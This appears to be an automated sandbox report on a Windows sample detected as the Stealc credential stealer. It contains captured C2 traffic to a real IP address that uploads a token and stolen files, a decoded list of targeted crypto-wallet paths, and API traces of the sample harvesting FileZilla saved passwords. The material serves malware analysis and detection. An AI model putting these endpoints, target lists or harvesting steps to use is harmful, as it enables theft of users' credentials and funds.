Aug 29, 2024 15:43:01.045479059 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:43:00 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Aug 29, 2024 15:43:01.170803070 CEST	467	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH Host: 185.215.113.100 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"files------HJJJECFIECBGDGCAAAEH--
Aug 29, 2024 15:43:01.562764883 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:43:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:43:01.576001883 CEST	565	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFH Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="file"------CAFIJKFHIJKKEBGCFBFH--
Aug 29, 2024 15:43:02.355930090 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:43:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:43:02.383411884 CEST	474	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC Host: 185.215.113.100 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="message"ybncbhylepme------GDGHJEHJJDAAAKEBGCFC--
Aug 29, 2024 15:43:02.628546953 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:43:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5458 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 31 3c 62 72 3e 3c 62 72 3e 2a 2e 30 3c 62 72 3e 3c 62 72 3e 2a 2e 70 6c 3c 62 72 3e 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 3c 62 72 3e 2a 2e 7a 6d 3c 62 72 3e 3c 62 72 3e 2a 2e 76 65 3c 62 72 3e 3c 62 72 3e 2a 2e 70 6b 3c 62 72 3e 3c 62 72 3e 2a 2e 72 73 3c 62 72 3e 3c 62 72 3e 2a 2e 70 68 3c 62 72 3e 3c 62 72 3e 2a 2e 6d 78 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 3c 62 72 3e 2a 2e 74 68 3c 62 72 3e 3c 62 72 3e 2a 2e 63 6f 3c 62 72 3e 3c 62 72 3e 2a 2e 69 64 3c 62 72 3e 3c 62 72 3e 2a 7a 2e 69 64 3c 62 72 3e 3c 62 72 3e 2a 2e 74 72 3c 62 72 3e 3c 62 72 3e 2a 2e 63 7a 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6f 3c 62 72 3e 3c 62 72 3e 2a 2e 64 7a 3c 62 72 3e 3c 62 72 3e 2a 2e 64 65 3c 62 72 3e 3c 62 72 3e 2a 2e 6b 72 3c 62 72 3e 3c 62 72 3e 2a 2e 6d [TRUNCATED] Data Ascii: .1<br><br>.0<br><br>.pl<br><br>.ar<br><br>.br<br><br>.ec<br><br>.eg<br><br>.in<br><br>.pt<br><br>.ac<br><br>.bd<br><br>.zm<br><br>.ve<br><br>.pk<br><br>.rs<br><br>.ph<br><br>.mx<br><br>.in<br><br>.th<br><br>.co<br><br>.id<br><br>z.id<br><br>.tr<br><br>.cz<br><br>.io<br><br>.dz<br><br>.de<br><br>.kr<br><br>.ma<br><br>.jp<br><br>.za<br><br>.sa<br><br>.vn<br><br>.cl<br><br>.pe<br><br>.ke<br><br>.tw<br><br>.cn<br><br>.my<br><br>.mz<br><br>.sv<br><br>.au<br><br>.bo<br><br>.mn<br><br>.lb<br><br>.es<br><br>.org<br><br>.uk<br><br>.ug<br><br>.sy<br><br>.gh<br><br>.bc<br><br>.ao<br><br>.ni<br><br>.ng<br><br>.to<br><br>.edu<br><br>.it<br><br>.tn<br><br>.net<br><br>.gn<br><br>.hk<br><br>.uy<br><br>.ae<br><br>.np<br><br>.mm<br><br>.do<br><br>.ir<br><br>.biz<br><br>.tv<br><br>.gt<br><br>.ps<br><br>.dk<br><br>.gp<br><br>.hu<br><br>.ge<br><br>.ci<br><br>.ca<br><br>.al<br><br>.jo<br><br>.sn<br><br>.is<br><br>.ro<br><br>.cr<br><
Aug 29, 2024 15:43:02.630100012 CEST	474	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJE Host: 185.215.113.100 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 2d 2d 0d 0a Data Ascii: ------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DAAECAFHDBGIDGCAEHJE--
Aug 29, 2024 15:43:03.444525957 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:43:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	09:42:42
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x950000
File size:	1'806'848 bytes
MD5 hash:	78BDEA9E949A906DE71A9E7E392949E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00960090 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 00968880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00959A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00959A3C
Part of subcall function 00959A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A61
Part of subcall function 00959A10: LocalAlloc.KERNEL32(00000040,?), ref: 00959A81
Part of subcall function 00959A10: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959AAA
Part of subcall function 00959A10: LocalFree.KERNEL32(0095148F), ref: 00959AE0
Part of subcall function 00959A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00959AEA

Part of subcall function 009688D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009688F2

GetProcessHeap.KERNEL32(00000000,000F423F,00970DA6,00970DA3,00970DA2,00970D9F), ref: 009601A2
RtlAllocateHeap.NTDLL(00000000), ref: 009601A9
StrStrA.SHLWAPI(00000000,<Host>), ref: 009601C5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 009601D3
StrStrA.SHLWAPI(00000000,<Port>), ref: 0096020F
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 0096021D
StrStrA.SHLWAPI(00000000,<User>), ref: 00960259
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 00960267
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009602A3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 009602B5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 00960342
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 0096035A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 00960372
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 0096038A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 009603A2
lstrcat.KERNEL32(?,profile: null), ref: 009603B1
lstrcat.KERNEL32(?,url: ), ref: 009603C0
lstrcat.KERNEL32(?,00000000), ref: 009603D3
lstrcat.KERNEL32(?,0097161C), ref: 009603E2
lstrcat.KERNEL32(?,00000000), ref: 009603F5
lstrcat.KERNEL32(?,00971620), ref: 00960404
lstrcat.KERNEL32(?,login: ), ref: 00960413
lstrcat.KERNEL32(?,00000000), ref: 00960426
lstrcat.KERNEL32(?,0097162C), ref: 00960435
lstrcat.KERNEL32(?,password: ), ref: 00960444
lstrcat.KERNEL32(?,00000000), ref: 00960457
lstrcat.KERNEL32(?,0097163C), ref: 00960466
lstrcat.KERNEL32(?,00971640), ref: 00960475
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970D9E), ref: 009604CE

Strings

password: , xrefs: 0096043B
<Port>, xrefs: 00960206
url: , xrefs: 009603B7
browser: FileZilla, xrefs: 00960399
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 009600E4
<Pass encoding="base64">, xrefs: 0096029A
<Host>, xrefs: 009601BC
login: , xrefs: 0096040A
profile: null, xrefs: 009603A8
<User>, xrefs: 00960250

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateChangeCloseCreateFindFolderFreeNotificationPathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 2695953057-555421843
Opcode ID: 338fd22d93057e9d73c7719d0f1a5e6410b3b5921ccebc5919c9fc5b8be37cf6
Instruction ID: 1e926cd8a9914703fa27c3578f4aa20c254b668f9f128af173ab62e32b6e2a3e
Opcode Fuzzy Hash: 338fd22d93057e9d73c7719d0f1a5e6410b3b5921ccebc5919c9fc5b8be37cf6
Instruction Fuzzy Hash: E9D11A72910208ABCB04EBF4DC9AEEE7778AF94304F408518F506B7195EF74AA49CF65

Function 00969270 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01200558), ref: 009692B1
GetProcAddress.KERNEL32(75900000,01200708), ref: 009692CA
GetProcAddress.KERNEL32(75900000,012006C0), ref: 009692E2
GetProcAddress.KERNEL32(75900000,01200600), ref: 009692FA
GetProcAddress.KERNEL32(75900000,012005B8), ref: 00969313
GetProcAddress.KERNEL32(75900000,012088C0), ref: 0096932B
GetProcAddress.KERNEL32(75900000,011F66E0), ref: 00969343
GetProcAddress.KERNEL32(75900000,011F6840), ref: 0096935C
GetProcAddress.KERNEL32(75900000,012005D0), ref: 00969374
GetProcAddress.KERNEL32(75900000,01200810), ref: 0096938C
GetProcAddress.KERNEL32(75900000,012005E8), ref: 009693A5
GetProcAddress.KERNEL32(75900000,01200630), ref: 009693BD
GetProcAddress.KERNEL32(75900000,011F6A00), ref: 009693D5
GetProcAddress.KERNEL32(75900000,012006D8), ref: 009693EE
GetProcAddress.KERNEL32(75900000,012007C8), ref: 00969406
GetProcAddress.KERNEL32(75900000,011F66A0), ref: 0096941E
GetProcAddress.KERNEL32(75900000,01200720), ref: 00969437
GetProcAddress.KERNEL32(75900000,01200750), ref: 0096944F
GetProcAddress.KERNEL32(75900000,011F6700), ref: 00969467
GetProcAddress.KERNEL32(75900000,01200780), ref: 00969480
GetProcAddress.KERNEL32(75900000,011F6780), ref: 00969498
LoadLibraryA.KERNEL32(01200648,?,009664A0), ref: 009694AA
LoadLibraryA.KERNEL32(01200798,?,009664A0), ref: 009694BB
LoadLibraryA.KERNEL32(01200828,?,009664A0), ref: 009694CD
LoadLibraryA.KERNEL32(01200690,?,009664A0), ref: 009694DF
LoadLibraryA.KERNEL32(012007B0,?,009664A0), ref: 009694F0
GetProcAddress.KERNEL32(75070000,01200840), ref: 00969512
GetProcAddress.KERNEL32(75FD0000,01200570), ref: 00969533
GetProcAddress.KERNEL32(75FD0000,01208E50), ref: 0096954B
GetProcAddress.KERNEL32(75A50000,01208E38), ref: 0096956D
GetProcAddress.KERNEL32(74E50000,011F68C0), ref: 0096958E
GetProcAddress.KERNEL32(76E80000,012089C0), ref: 009695AF
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 009695C6

Strings

NtQueryInformationProcess, xrefs: 009695BA

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 74b750c3c820c60d99cddd3511393990a7d8695da97c237fdaa4208034d2ce93
Instruction ID: 9c69f0c08cdf3dd4f9f695689424969f493f9933d6c818a46b697ad38e31d444
Opcode Fuzzy Hash: 74b750c3c820c60d99cddd3511393990a7d8695da97c237fdaa4208034d2ce93
